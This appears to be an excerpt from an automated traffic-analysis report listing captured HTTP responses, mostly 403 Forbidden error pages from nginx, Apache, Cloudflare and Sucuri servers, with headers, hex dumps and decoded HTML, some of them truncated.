                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=a%2BH8raP6MlN9oxwj7rQS8EaE3zOQH7ZP6PzlGqFD2eSfKgaRM61nrgUX5eeEQTHxswYt%2FPXKK9rVZEgtOZcCmjsYVCIkAWXBsZMwWlNzxaIs1PC22tj3kAn7ACyGZCk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a089f1a361e-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:02 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b6YPn7N2KFrJpUpZQ%2Flv1%2Fao3Mz26UEHSAlhiv9JbbDG68jUosM98CRCRNGlpopYSThLjmHfXPzcDz32PbcOnDlsZC4CqMJlme8jtF%2F8W3V4YgYdDiv2DUkItdTXBiY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a092f6637d2-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Wed, 31 May 2023 12:52:02 GMTContent-Type: text/htmlContent-Length: 918Connection: keep-aliveLast-Modified: Mon, 27 Jan 2020 20:24:24 GMTETag: "396-59d24e4b2e24e"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 35 30 33 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 64 6f 77 6e 74 69 6d 65 20 6f 72 20 63 61 70 61 63 69 74 79 20 70 72 6f 62 6c 65 6d 73 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:52:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=20X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: b1481ef5-c65a-4acc-8750-9ad3daa023e3CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o2QM0UTZPR837MZVbLVUwD8F8OI%2BRWDSkssJsCowJGnoA78YL%2F%2BSkwjx9xLlEXVpQWIIyHCjhWmNx6RE%2FoZpH%2FeoQEDwZ3Vsuek1TxMcx6wPjQ0wC%2Fvbrej1E%2B34"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=150.000095Server: cloudflareCF-RAY: 7cff5a0bcf7e1981-FRAalt-svc: h3=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:02 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 31 May 2023 12:52:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15015X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: BNP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 64 38 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:03 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 31 May 2023 12:52:03 GMTcontent-type: text/html; charset=iso-8859-1content-length: 199server: Apachex-iplb-request-id: 66818F2B:C56E_D5BA2110:0050_647742F3_A9C8:2E5E0x-iplb-instance: 28103Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:52:03 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 318Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 